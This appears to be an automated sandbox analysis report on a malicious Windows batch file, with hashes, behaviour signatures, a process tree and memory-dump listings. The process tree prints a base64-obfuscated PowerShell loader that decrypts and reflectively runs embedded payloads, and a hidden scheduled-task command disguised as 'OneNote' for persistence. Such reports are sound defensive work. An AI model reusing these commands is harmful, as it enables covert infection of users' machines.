7d69e0d82e74059115486fae5dd5ac6463c7fccd91dbbcaa9587117c7d201ddb

Resubmissions

22-04-2024 22:02

240422-1xtwbagh68 10

22-04-2024 19:25

240422-x42b7afa68 10

19-04-2024 03:02

240419-djmthsfh8w 10

Analysis

max time kernel
201s
max time network
213s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
22-04-2024 19:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat
Size

1.1MB
MD5

4030841f8cd4b3ac37ab0a0b9332f3a5
SHA1

6d05584de372399fbadd59a1e6a1eefee90f8725
SHA256

10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1
SHA512

a8c40c3fa3f7f9ba47eed94a55a2562719073fd568d4aa96a081a46ce150e0b068b453e812eaef3fe15cafae3b66127e23ed4d72669173c8c254ba58d32534c0
SSDEEP

24576:+NAwcGqisVN8rXpLOnM+YCftp99Jj9Pgxp1QrKDI:+NKVVsxmt9j

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 19 IoCs

Processes:

powershell.exe

flow	pid	process
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe
1	1128	powershell.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
912	powershell.exe
912	powershell.exe
128	powershell.exe
128	powershell.exe
4576	powershell.exe
4576	powershell.exe
2352	powershell.exe
2352	powershell.exe
1128	powershell.exe
1128	powershell.exe
1468	powershell.exe
1468	powershell.exe
2324	powershell.exe
2324	powershell.exe
4668	powershell.exe
4668	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	128	powershell.exe
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeIncreaseQuotaPrivilege	4576	powershell.exe
Token: SeSecurityPrivilege	4576	powershell.exe
Token: SeTakeOwnershipPrivilege	4576	powershell.exe
Token: SeLoadDriverPrivilege	4576	powershell.exe
Token: SeSystemProfilePrivilege	4576	powershell.exe
Token: SeSystemtimePrivilege	4576	powershell.exe
Token: SeProfSingleProcessPrivilege	4576	powershell.exe
Token: SeIncBasePriorityPrivilege	4576	powershell.exe
Token: SeCreatePagefilePrivilege	4576	powershell.exe
Token: SeBackupPrivilege	4576	powershell.exe
Token: SeRestorePrivilege	4576	powershell.exe
Token: SeShutdownPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeSystemEnvironmentPrivilege	4576	powershell.exe
Token: SeRemoteShutdownPrivilege	4576	powershell.exe
Token: SeUndockPrivilege	4576	powershell.exe
Token: SeManageVolumePrivilege	4576	powershell.exe
Token: 33	4576	powershell.exe
Token: 34	4576	powershell.exe
Token: 35	4576	powershell.exe
Token: 36	4576	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeIncreaseQuotaPrivilege	2352	powershell.exe
Token: SeSecurityPrivilege	2352	powershell.exe
Token: SeTakeOwnershipPrivilege	2352	powershell.exe
Token: SeLoadDriverPrivilege	2352	powershell.exe
Token: SeSystemProfilePrivilege	2352	powershell.exe
Token: SeSystemtimePrivilege	2352	powershell.exe
Token: SeProfSingleProcessPrivilege	2352	powershell.exe
Token: SeIncBasePriorityPrivilege	2352	powershell.exe
Token: SeCreatePagefilePrivilege	2352	powershell.exe
Token: SeBackupPrivilege	2352	powershell.exe
Token: SeRestorePrivilege	2352	powershell.exe
Token: SeShutdownPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeSystemEnvironmentPrivilege	2352	powershell.exe
Token: SeRemoteShutdownPrivilege	2352	powershell.exe
Token: SeUndockPrivilege	2352	powershell.exe
Token: SeManageVolumePrivilege	2352	powershell.exe
Token: 33	2352	powershell.exe
Token: 34	2352	powershell.exe
Token: 35	2352	powershell.exe
Token: 36	2352	powershell.exe
Token: SeIncreaseQuotaPrivilege	2352	powershell.exe
Token: SeSecurityPrivilege	2352	powershell.exe
Token: SeTakeOwnershipPrivilege	2352	powershell.exe
Token: SeLoadDriverPrivilege	2352	powershell.exe
Token: SeSystemProfilePrivilege	2352	powershell.exe
Token: SeSystemtimePrivilege	2352	powershell.exe
Token: SeProfSingleProcessPrivilege	2352	powershell.exe
Token: SeIncBasePriorityPrivilege	2352	powershell.exe
Token: SeCreatePagefilePrivilege	2352	powershell.exe
Token: SeBackupPrivilege	2352	powershell.exe
Token: SeRestorePrivilege	2352	powershell.exe
Token: SeShutdownPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeSystemEnvironmentPrivilege	2352	powershell.exe
Token: SeRemoteShutdownPrivilege	2352	powershell.exe
Token: SeUndockPrivilege	2352	powershell.exe
Token: SeManageVolumePrivilege	2352	powershell.exe
Token: 33	2352	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 3500 wrote to memory of 3464	3500	cmd.exe	cmd.exe
PID 3500 wrote to memory of 3464	3500	cmd.exe	cmd.exe
PID 3500 wrote to memory of 3496	3500	cmd.exe	cmd.exe
PID 3500 wrote to memory of 3496	3500	cmd.exe	cmd.exe
PID 3496 wrote to memory of 2380	3496	cmd.exe	cmd.exe
PID 3496 wrote to memory of 2380	3496	cmd.exe	cmd.exe
PID 3496 wrote to memory of 2800	3496	cmd.exe	cmd.exe
PID 3496 wrote to memory of 2800	3496	cmd.exe	cmd.exe
PID 3496 wrote to memory of 912	3496	cmd.exe	powershell.exe
PID 3496 wrote to memory of 912	3496	cmd.exe	powershell.exe
PID 912 wrote to memory of 128	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 128	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 4576	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 4576	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 2352	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 2352	912	powershell.exe	powershell.exe
PID 912 wrote to memory of 3696	912	powershell.exe	cmd.exe
PID 912 wrote to memory of 3696	912	powershell.exe	cmd.exe
PID 3696 wrote to memory of 4984	3696	cmd.exe	cmd.exe
PID 3696 wrote to memory of 4984	3696	cmd.exe	cmd.exe
PID 4984 wrote to memory of 932	4984	cmd.exe	cmd.exe
PID 4984 wrote to memory of 932	4984	cmd.exe	cmd.exe
PID 4984 wrote to memory of 4564	4984	cmd.exe	cmd.exe
PID 4984 wrote to memory of 4564	4984	cmd.exe	cmd.exe
PID 4984 wrote to memory of 1128	4984	cmd.exe	powershell.exe
PID 4984 wrote to memory of 1128	4984	cmd.exe	powershell.exe
PID 1128 wrote to memory of 1468	1128	powershell.exe	powershell.exe
PID 1128 wrote to memory of 1468	1128	powershell.exe	powershell.exe
PID 1128 wrote to memory of 2324	1128	powershell.exe	powershell.exe
PID 1128 wrote to memory of 2324	1128	powershell.exe	powershell.exe
PID 1128 wrote to memory of 4668	1128	powershell.exe	powershell.exe
PID 1128 wrote to memory of 4668	1128	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
2⤵
PID:3464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
3⤵
PID:2380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24ga1JGT2soJERNSmFHKXskUXpwdGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFF6cHRlLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskUXpwdGUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRRenB0ZS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRjB3NXFsREI3QUlVTmtQVG5CWTBQeUVod2ppZzM0Zm1wb3I5S2ZqeWtvYz0nKTskUXpwdGUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZHJXWWdZV3ptMEhxQjA1ZHpyck1Ddz09Jyk7JGRHR2VBPSRRenB0ZS5DcmVhdGVEZWNyeXB0b3IoKTskT2tGeWU9JGRHR2VBLlRyYW5zZm9ybUZpbmFsQmxvY2soJERNSmFHLDAsJERNSmFHLkxlbmd0aCk7JGRHR2VBLkRpc3Bvc2UoKTskUXpwdGUuRGlzcG9zZSgpOyRPa0Z5ZTt9ZnVuY3Rpb24gbEZOSHYoJERNSmFHKXskUHZ3WXc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkRE1KYUcpOyRiYW9EZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JGxYcUJ3PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFB2d1l3LFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbFhxQncuQ29weVRvKCRiYW9EZCk7JGxYcUJ3LkRpc3Bvc2UoKTskUHZ3WXcuRGlzcG9zZSgpOyRiYW9EZC5EaXNwb3NlKCk7JGJhb0RkLlRvQXJyYXkoKTt9JHJydUhvPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskeGJuQW09bEZOSHYgKGtSRk9rIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJHJydUhvLCA1KS5TdWJzdHJpbmcoMikpKSk7JE9NU3hJPWxGTkh2IChrUkZPayAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRycnVIbywgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kT01TeEkpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHhibkFtKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
3⤵
PID:2800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 96746' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
4⤵
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
5⤵
- Suspicious use of WriteProcessMemory
PID:4984

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
6⤵
PID:932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24ga1JGT2soJERNSmFHKXskUXpwdGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFF6cHRlLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskUXpwdGUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRRenB0ZS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRjB3NXFsREI3QUlVTmtQVG5CWTBQeUVod2ppZzM0Zm1wb3I5S2ZqeWtvYz0nKTskUXpwdGUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZHJXWWdZV3ptMEhxQjA1ZHpyck1Ddz09Jyk7JGRHR2VBPSRRenB0ZS5DcmVhdGVEZWNyeXB0b3IoKTskT2tGeWU9JGRHR2VBLlRyYW5zZm9ybUZpbmFsQmxvY2soJERNSmFHLDAsJERNSmFHLkxlbmd0aCk7JGRHR2VBLkRpc3Bvc2UoKTskUXpwdGUuRGlzcG9zZSgpOyRPa0Z5ZTt9ZnVuY3Rpb24gbEZOSHYoJERNSmFHKXskUHZ3WXc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkRE1KYUcpOyRiYW9EZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JGxYcUJ3PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFB2d1l3LFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbFhxQncuQ29weVRvKCRiYW9EZCk7JGxYcUJ3LkRpc3Bvc2UoKTskUHZ3WXcuRGlzcG9zZSgpOyRiYW9EZC5EaXNwb3NlKCk7JGJhb0RkLlRvQXJyYXkoKTt9JHJydUhvPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskeGJuQW09bEZOSHYgKGtSRk9rIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJHJydUhvLCA1KS5TdWJzdHJpbmcoMikpKSk7JE9NU3hJPWxGTkh2IChrUkZPayAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRycnVIbywgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kT01TeEkpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHhibkFtKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
6⤵
PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 96746' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4668

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
1KB

MD5
3de28cd5f59fc1551ce2e2f375c6e93a

SHA1
3a68302c7a7d951134367b7f02af44543e42cc71

SHA256
199df76d6e45683f420a85e7b6cc5e708c2eefef6998e8fb48e63e3c52c54ca7

SHA512
d860b2024ad0f6b4b53af2c3fd274fae5351fbf11f697004646b188ffcd533b88164dc5543598ac0fd0ac8638996af1fe171945ddacb53a8c3347e4791839c94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4a24cd2f7eea1929ac05a4dc990d3e67

SHA1
a5a1ee3e677d7c5991437c8345eaa933ac57294f

SHA256
8ab16f36aefdeee67c57653d0ce6ecc5bc7d114597d20de7361ca8a78c222ee6

SHA512
a283d3efc7ee602c01751eb46ef258993f3e19eef515aa9cc1c749b1217ea4eb10187573ffab3926e11711b428873222a556125702e2d6e5c3693e588b7a39cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
52805a54fc501a9f52f785d9cc7cce8a

SHA1
de4e1c104761cb0c2f89ed726d8373906a0bf844

SHA256
8b877cb7cdc0e43808518e437605baa2e905cb707a047eb66bed83848f3292d6

SHA512
fd7f479ce372c524d3b95527849016b257e93c97990afad219776f5fe537bc02f15bd0444fc5f53b3f6c9e4b7818db61df26ad903c93138369a184974d2ea319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4dcb591f64c5a200feded5b3963da678

SHA1
77c4941ac998d3cc3e55f74b0a152b7138e2fb67

SHA256
1fbd242d477324cd00b4eca95abe8d353ce7fb4898e7fcbd8b579c48dfb598b7

SHA512
08d81df9bbfea221341f7d79dab541957b618a2690657b3448b5ffb9f4e5b4b2eb4ea00188e6a071aa41e09e38c2242299c8f0027261a39cece900fc09a4dce3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0tl3ejh.hy2.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\strt.cmd
Filesize
1.1MB

MD5
4030841f8cd4b3ac37ab0a0b9332f3a5

SHA1
6d05584de372399fbadd59a1e6a1eefee90f8725

SHA256
10de02fec8ac3edbf1398e6dd43ddec95a89e0499e1e865a7d9e5289fb2b31d1

SHA512
a8c40c3fa3f7f9ba47eed94a55a2562719073fd568d4aa96a081a46ce150e0b068b453e812eaef3fe15cafae3b66127e23ed4d72669173c8c254ba58d32534c0

Download Submit
memory/128-14-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/128-15-0x000001D8F7FC0000-0x000001D8F7FD0000-memory.dmp

Filesize
64KB

Download
memory/128-24-0x000001D8F7FC0000-0x000001D8F7FD0000-memory.dmp

Filesize
64KB

Download
memory/128-27-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/912-29-0x00000179F4C90000-0x00000179F4D68000-memory.dmp

Filesize
864KB

Download
memory/912-58-0x00000179F4820000-0x00000179F4830000-memory.dmp

Filesize
64KB

Download
memory/912-28-0x00000179F49D0000-0x00000179F49DA000-memory.dmp

Filesize
40KB

Download
memory/912-7-0x00000179F4830000-0x00000179F4852000-memory.dmp

Filesize
136KB

Download
memory/912-13-0x00000179F4C40000-0x00000179F4C86000-memory.dmp

Filesize
280KB

Download
memory/912-12-0x00000179F4820000-0x00000179F4830000-memory.dmp

Filesize
64KB

Download
memory/912-92-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/912-66-0x00000179F4820000-0x00000179F4830000-memory.dmp

Filesize
64KB

Download
memory/912-10-0x00000179F4820000-0x00000179F4830000-memory.dmp

Filesize
64KB

Download
memory/912-11-0x00000179F4820000-0x00000179F4830000-memory.dmp

Filesize
64KB

Download
memory/912-55-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/912-9-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/912-56-0x00000179F4820000-0x00000179F4830000-memory.dmp

Filesize
64KB

Download
memory/1128-154-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-168-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-2451-0x000001F82A780000-0x000001F82A7CC000-memory.dmp

Filesize
304KB

Download
memory/1128-2450-0x000001F82A6E0000-0x000001F82A77E000-memory.dmp

Filesize
632KB

Download
memory/1128-1618-0x000001F811840000-0x000001F811850000-memory.dmp

Filesize
64KB

Download
memory/1128-971-0x000001F811840000-0x000001F811850000-memory.dmp

Filesize
64KB

Download
memory/1128-75-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/1128-76-0x000001F811840000-0x000001F811850000-memory.dmp

Filesize
64KB

Download
memory/1128-78-0x000001F811840000-0x000001F811850000-memory.dmp

Filesize
64KB

Download
memory/1128-969-0x000001F811840000-0x000001F811850000-memory.dmp

Filesize
64KB

Download
memory/1128-967-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/1128-186-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-184-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-182-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-180-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-178-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-176-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-174-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-172-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-170-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-166-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-164-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-162-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-160-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-121-0x000001F82A4E0000-0x000001F82A5B8000-memory.dmp

Filesize
864KB

Download
memory/1128-122-0x000001F82A5C0000-0x000001F82A6D6000-memory.dmp

Filesize
1.1MB

Download
memory/1128-123-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-124-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-126-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-128-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-130-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-132-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-136-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-138-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-134-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-140-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-142-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-144-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-146-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-148-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-150-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-152-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-158-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1128-156-0x000001F82A5C0000-0x000001F82A6D1000-memory.dmp

Filesize
1.1MB

Download
memory/1468-91-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/1468-87-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/1468-88-0x000001B87A550000-0x000001B87A560000-memory.dmp

Filesize
64KB

Download
memory/1468-89-0x000001B87A550000-0x000001B87A560000-memory.dmp

Filesize
64KB

Download
memory/2324-94-0x000001EE902F0000-0x000001EE90300000-memory.dmp

Filesize
64KB

Download
memory/2324-95-0x000001EE902F0000-0x000001EE90300000-memory.dmp

Filesize
64KB

Download
memory/2324-93-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/2324-106-0x00007FFCAA810000-0x00007FFCAB2D2000-memory.dmp

Filesize
10.8MB

Download
memory/2352-50-0x0000022463950000-0x0000022463960000-memory.dmp

Filesize
64KB

Download
memory/2352-44-0x0000022463950000-0x0000022463960000-memory.dmp

Filesize
